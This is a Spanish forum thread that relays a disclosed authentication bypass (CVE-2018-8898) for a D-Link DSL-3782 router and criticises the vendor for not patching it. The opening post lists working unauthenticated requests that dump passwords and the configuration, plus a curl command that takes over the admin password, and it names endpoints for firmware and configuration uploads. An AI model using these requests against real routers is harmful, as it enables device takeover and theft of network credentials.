Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

kcdtv · 21-05-2018 13:00:52

Cómo entrar en la interfaz de configuración de un D-Link DSL-3872 sin credenciales

fuente

D-Link DSL 3782 - Authentication Bypass by Giulio Comi @ packetsorms

El D-Link DSL-3872 es un modelo de doble banda con soporte ac.
No es un modelo de alta gama o de última generación pero tampoco está completamente desfasado.
Wireless AC1200 Dual Band VDSL ADSL Modem Router DSL‑3782
Vamos a ver juntos lo fácil que es saltarse los credenciales para tomar el control del dispositivo

Para obtener todas las contraseñas basta con entrar está petición en la barra del navegador

GET  http://192.168.1.1/romfile.cfg

Si lo que buscamos son solo las contraseñas wifi, podemos obtenerlas así:

Red b/g/n;

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp

Red ac:

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp

Red invitados

GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp

Si queremos modificar la configuración directamente, una llave de sesión es necesaria.
Se obtiene así:

GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp

Una vez que tenemos a esta llave podemos emplearla para cambiar la configuración del dispositivo con peticiones POST.
Ejemplos:

Cambiar los credenciales de administrador de acceso a la interfaz web

curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp

Cambiar las contraseñas wifi

POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp

Actualizar firmware

POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp

Forzar reboot

POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp

Subir una nueva configuración

POST /cgi-bin/New_GUI/Set/config_upgrade.asp

El problema, otra vez, es que D-Link no ha hecho nada tras haber sido advertido. pam
Otro problema es que la explotar la brecha es de lo más sencillo debido a la pésima programación del firmware.
El router es básicamente incapaz de distinguir las peticiones de un usuario debidamente identificado de las peticiones de un usuario ilegitimo.
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link! roll

crash · 21-05-2018 13:13:08

vaya tela, ya solo le falta abrir la puerta de la cocina y traerte unas biere

kcdtv · 21-05-2018 13:18:42

Una lastima que los routers no tengan brazos y patas aún, sino sería posible con una "smart nevera" de estas conectada al PA. big_smile

josep345 · 21-05-2018 13:20:56

sheriff escribió:

Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link!

Jajajajaja nunca mejor explicado Xd,a quien le gusta estar con el culo al aire,,,,buena información a tener muy en cuenta para los propietarios de dichos routers.

Tema	Respuestas	Vistas	Ultimo mensaje
Pegado: Pegado:: Giga-fast router WiFi AC1200R de Alfa Network... ¡Excepcional! por kcdtv	11	3179	20-11-2019 19:06:04 por muglio
Phineas Fisher da recompensa de 100 000$ para hack de interes publico por kcdtv	0	57	20-11-2019 18:28:04 por kcdtv
Pegado: Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r [ 1 2 3 … 14 ]	339	27622	18-11-2019 17:37:12 por kcdtv
Problemas con apache por Hunter310#	2	130	15-11-2019 17:10:40 por kcdtv
Askey RTF3505VW pin xxxxxxx por Sdocks	3	381	13-11-2019 16:13:42 por kcdtv

Foro Wifi-libre.com

Anuncio

#1 21-05-2018 13:00:52